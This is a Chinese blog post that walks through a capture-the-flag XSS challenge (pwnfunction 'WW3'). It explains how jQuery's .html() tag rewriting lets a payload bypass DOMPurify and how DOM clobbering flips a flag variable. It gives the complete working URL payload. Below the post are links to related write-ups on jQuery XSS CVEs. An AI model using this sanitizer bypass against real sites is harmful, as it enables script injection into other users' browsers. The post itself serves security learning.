XSS-Jquery.html()+DOM破坏

于 2024-08-26 08:56:56 发布
阅读量918 收藏 11
点赞数 15
文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75913164/article/details/141547462
版权

目录

靶场网址:​ https://xss.pwnfunction.com/challenges/ww3/ ​

分析代码:

Jquery.html()解析原理:

DOM-clobbering

JS作用域&作用域链

靶场网址:​ https://xss.pwnfunction.com/challenges/ww3/ ​

分析代码:

  <div>
        <h4>Meme Code</h4>
        <textarea class="form-control" id="meme-code" rows="4"></textarea>
        <div id="notify"></div>
    </div>
     
    <script>
        /* Utils */
        const escape = (dirty) => unescape(dirty).replace(/[<>'"=]/g, '');
        const memeTemplate = (img, text) => {
            return (`<style>@import url('https://fonts.googleapis.com/css?family=Oswald:700&display=swap');`+
                `.meme-card{margin:0 auto;width:300px}.meme-card>img{width:300px}`+
                `.meme-card>h1{text-align:center;color:#fff;background:black;margin-top:-5px;`+
                `position:relative;font-family:Oswald,sans-serif;font-weight:700}</style>`+
                `<div class="meme-card"><img src="${img}"><h1>${text}</h1></div>`)
        }
        const memeGen = (that, notify) => {
            if (text && img) {
                template = memeTemplate(img, text)
     
                if (notify) {
                    html = (`<div class="alert alert-warning" role="alert"><b>Meme</b> created from ${DOMPurify.sanitize(text)}</div>`)
                }
     
                setTimeout(_ => {
                    $('#status').remove()
                    notify ? ($('#notify').html(html)) : ''
                    $('#meme-code').text(template)
                }, 1000)
            }
        }
    </script>
     
    <script>
        /* Main */
        let notify = false;
        let text = new URL(location).searchParams.get('text')
        let img = new URL(location).searchParams.get('img')
        if (text && img) {
            document.write(
                `<div class="alert alert-primary" role="alert" id="status">`+
                `<img class="circle" src="${escape(img)}" onload="memeGen(this, notify)">`+
                `Creating meme... (${DOMPurify.sanitize(text)})</div>`
            )
        } else {
            $('#meme-code').text(memeTemplate('https://i.imgur.com/PdbDexI.jpg', 'When you get that WW3 draft letter'))
        }
    </script>

可控的输入的点有两个text,img

    let text = new URL(location).searchParams.get('text')
    let img = new URL(location).searchParams.get('img')

但是 img作为img标签的src属性被写入,且被过滤了关键符号。

text作为文本被渲染,渲染前都经过一次DOMPurify.sanitize处理

     //part1
    document.write(
    ...
    Creating meme... (${DOMPurify.sanitize(text)})
    )

    //part2
    html = (`<div class="alert alert-warning" role="alert"><b>Meme</b> created from ${DOMPurify.sanitize(text)}</div>`)

    notify ? ($('#notify').html(html)) : ''

Jquery.html()解析原理:

乍一看经过DOMPurify后的这些交互点都很安全,但是使用html()解析会存在标签逃逸问题。

两种解析html的方式:jquery.html&innerhtml。innerHTML是原生js的写法,Jqury.html()也是调用原生的innerHTML方法,但是加了自己的解析规则(后文介绍)。

关于两种方式:Jquery.html()和innerHTMl的区别我们用示例来看。

对于innerHTML:

    模拟浏览器自动补全标签,不处理非法标签。同时,<style>标签中不允许存在子标签(style标签最初的设计理念就不能用来放子标签),如果存在会被当作text解析。

 因此<style><style/><script>alert(1337)//会被渲染如下

    <style>
        <style/><script>alert(1337)//
    </style>

对于Jqury.html():

    最终对标签的处理是在htmlPrefilter()中实现:jquery-src,其后再进行原生innerHTML的调用来加载到页面。他会对不规范的标签进行修复。

rxhtmlTag = /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^/>x20trnf]*)[^>]*)/>/gi
     
    jQuery.extend( {
        htmlPrefilter: function( html ) {
            return html.replace( rxhtmlTag, "<$1></$2>" );
        }
        ...
    })
     
    tmp.innerHTML = wrap[ 1 ] + jQuery.htmlPrefilter( elem ) + wrap[ 2 ];

这个正则表达式在匹配<*/>之后会重新生成一对标签(区别于直接调用innerHTML),例如:匹配到<div/>之后,他会修复这个标签,变为:<div></div>

所以我们传入的语句<style><style/><script>alert(1337)//则会被解析成如下形式,成功逃逸<script>标签。

    <style>
        <style>
    </style>
    <script>alert(1337)//

至于这里最后面为何要加两个//:

因为innerHtml会自动补全我们的不规范的标签,这里的style标签少一个,所以就会补全为<style> <style></style><script>alert(1337)//</style>,而我们的//刚好酒吧最后的style标签注释掉了。

而我们知道DOMPurify的工作机制是将传入的payload分配给元素的innerHtml属性,让浏览器解释它(但不执行),然后对潜在的XSS进行清理。由于DOMPurify在对其进行innerHtml处理时,我们传入的payload是传入到style这个标签里面了,script标签被当作style标签的text处理了,所以DOMPurify不会进行清洗(因为认为这是无害的payload),但在其后进入html()时,这个无害payload就能逃逸出来一个有害的script标签从而xss。

DOM-clobbering

而要想执行我们的payload,只有在notify不为false的时候才能顺利进入html()方法

    let notify = false;
     
    document.write(`<img class="circle" src="${escape(img)}" onload="memeGen(this, notify)">`)
     
    const memeGen = (that, notify) => {
            if (notify) {
                    html = (`${DOMPurify.sanitize(text)}`)
                }
            ...
            $('#notify').html(html)
    }

所以我们需要用DOM破坏来让notify变为true

尝试用DOM-clobbering创造一个id为notify的变量,但是这种方式不允许覆盖已经存在的变量。

不过我们依然可以借助标签的name属性值,为document对象创造一个变量document.notify
 

JS作用域&作用域链

    js的作用域就是会先去判断当前的scope是否有局部变量notify,若不存在向上查找window.document.notify,仍不存在继续向上到全局执行环境即window.notify为止。

所以我们用DOM破坏让name="notify",当它在局部找不到notify时,就会向上查找,最终找到我们覆盖的notify

而我们想要进入html()方法中,还需满足text&&mg这个条件

在当前函数内找不到text和img,onload 的作用域也找不到,就会往上去 script下面找,而多个 script 属于同一个作用域,在script中有text和img,于是就找到了。

而我们想要img为真,必须先执行text中的内容,因为text中有让notidy变为true的代码:DOM破坏将notify覆盖掉,它img中的onload变为真。这样才能满足text&&mg这个条件

    <img name=notify><style><style/><script>alert()//

 

那我们这里就要考虑代码执行顺序的问题了,如果先执行的是img,那我们的payload就不可能成功,原因刚刚讲过了。

而恰好img加载图片是异步加载,所以我们的text中的代码先执行, 然后才会加载图片,然后才会触发onload,而notify为真,就走到html()这个方法中了,就会执行我们的payload。

最终传参:

img=https://i.imgur.com/PdbDexI.jpg&text=<img name%3dnotify><style><style%2F><script>alert(1337)%2F%2F

 

代码执行成功!
 

发呆喜欢发呆
关注
jquery html方法xss,html() vs innerHTML jquery/javascript & XSS attacks
weixin_32821643的博客
07-13 315
I'm testing xss attacks on my own code. The example beneath is a simple box where an user can type whatever he wants. After pressing "test!" button, JS will show the input string into two divs.This i...
jquery html方法xss,jQuery使用中可能被XSS攻击的一些危险环节提醒
weixin_32657693的博客
07-13 1063
$我们经常使用向 $ 内传入一个字符串的方式来选择或生成 DOM 元素,但如果这个字符串是来自用户输入的话,那么这种方式就是有风险的。先看一个 DEMO:http://jsbin.com/duwuzonife/1/edit?html,js,output$("");当用户输入的字符串是像这样的时,虽然这个 元素不会马上被插入到网页的 DOM 中,但这个 DOM 元素已经被创建了,并且暂存在内存里。...
所谓jQuery.append()、jQuery.html()存在的XSS漏洞
aitaozhuo9068的博客
02-28 1210
使用jQuery.append()、jQuery.html()方法时,如果其中内容包含<script>脚本而没有经过任何处理的话,会执行它。 简单的示例代码如下: var xssStr = '<script>console.log(1)</script>'; $('#test').html(xssStr); 控制台会打印出“1”。 同...
jQuery3.0.0-3.5.0版本xss漏洞浅析、复现、修复
anlalu233的博客
07-22 5270
jQuery最新xss漏洞浅析、复现 2.1 环境搭建 对于此漏洞原作者搭建了在线环境,内置了三个xss poc,点击Append via .html()按钮即可触发xss 环境链接:https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html 2.2 源码分析 先用第一个红框模拟个开发环境,虽然三个poc都使用了包含onerror事件的img标签,但其实它们是放在属性或style元素内部,因此会绕过HTML清理器。 审查元素发现,点击之后会多出现一个闭
jquery-1.8.2.min.js
10-27
该版本主要修复之前两个版本中的一些bug和性能衰退问题,包括: Deferred:当typeof( target)=='object'时,Deferred.promise( target)才能正常工作 Event:使用委托事件和伪类时的性能衰退问题 ...
jquery-1.11.1.min.js_javascript_security_
09-29
例如,jQuery的`.html()`方法在插入HTML内容时会进行适当的转义,防止XSS攻击。此外,使用`.val()`来处理表单输入,可以确保数据的正确性和安全性。 然而,仅仅依赖jQuery并不能完全防止所有安全问题。开发者还需要...
php-jquery-login.zip_Enjoy
09-19
jQuery则是一个JavaScript库,它简化了JavaScript的DOM操作、事件处理、动画制作以及Ajax交互。在登录系统的开发中,jQuery可以用于处理用户输入验证、发送Ajax请求到服务器验证用户凭据、显示反馈信息等。 在这个...
json-lib-2.1.jar和struts2-json-plugin-2.1.8.1.jar
11-18
- 动态DOM操作:通过jQuery,可以高效地在页面上添加、修改或删除元素,根据接收到的JSON数据更新UI。 结合这三个组件,开发者可以构建出响应式、动态的Web应用,后端使用Struts 2处理业务逻辑,通过JSON Plugin...
JQuery Dom XSS探测.html
05-15
可以直接测试网站里面的JQuery本地弹窗xss,属于渗透测试项一部分,此项目在xss中也属于高危,只需要替换里面的带测试链接即可。
jQuery最新xss漏洞浅析、复现、修复
qq_29365787的博客
06-08 1万+
jQuery最新xss漏洞浅析、复现、修复 1、xss漏洞的形成和危害 形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是 应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。 在以下情况下会发生跨站点脚本编制 (XSS) 脆弱性: [1] 不可信数据进入 Web 应用程序,通常来自 Web 请求。 [2] Web 应用程序动态生成了包含此不可信数据的 Web 页面。 [3] 页面生成期间,应用程序不会禁止数据包含可由 Web 浏览器执
JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现】
最新发布
一纸荒芜的博客
10-31 1万+
jquery-xss漏洞复现
《WEB安全渗透测试》(24)jQuery中的XSS漏洞
午夜安全
04-28 4193
《WEB安全渗透测试》(24)jQuery中的XSS漏洞 jQuery在Web中广泛应用,当jQuery的版本大于或等于1.2且小于3.5.0的时候,即使执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQueryDOM操作方法(即html()、.append()等),从而导致xss漏洞。利用原作者搭建的环境:这个环境内置了三个xss poc,点击Append via .html()按钮即可触发XSS漏洞。......
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
热门推荐
1stPeak's Blog
03-25 2万+
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
HTML Purifier --非常好用的XSS过滤器
u010128133的博客
06-27 6033
# HTML Purifier # >前言:最近因公司项目需要做 HTML 标签过滤,同事推荐了 HTML Purifier 。 >使用过程中虽然因为英文太差(英文文档,网上相关博客比较少)的原因浪费了很多时间,但完成配置设置之后的使用过程还是比较方便的。 >因此在此写下经理的过程以作记录,也说不定能帮助到别人 ### HTML Purifier 简介 ### [HTML Pur
复现CVE-2020-11022/11023(jQuery XSS漏洞)
记录并分享学习安全的知识点..
05-31 6155
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQueryDOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本中 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
Web安全-JQuery框架XSS漏洞浅析
道阻且长,行则将至。
01-23 1万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具
jquery载入html内容到pre,jQuery jQuery.htmlPrefilter()方法
weixin_35384453的博客
05-31 335
jQuery jQuery.htmlPrefilter()方法实例从传入HTML字符串中删除所有标签$(function() {var htmlPrefilter = $.htmlPrefilter,rdel = /])[wW]*?1s*>/gi;$.htmlPrefilter = function( html ) {return htmlPrefilter.call( this, html...
jQuery源码分析之ajaxPrefilters方法
高山上的鱼
11-01 1877
prefilters源码分析: ajaxPrefilter: addToPrefiltersOrTransports( prefilters ), 可以看到内部直接调用了addToPrefiltersOrTransports方法 var rnotwhite = (/\S+/g); function addToPrefiltersOrTransports( structure ) {
jquery-1.11.1.js漏洞修复
05-20
2. 防止操作 DOM 元素时,传入非法参数:在调用 jQuery 提供的 DOM 操作方法时,应该确保传入的参数是合法的,例如,不应该传入空字符串或者无效的选择器。 3. 防止 JSON 数据劫持:在使用 jQuery 的 $.getJSON() ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值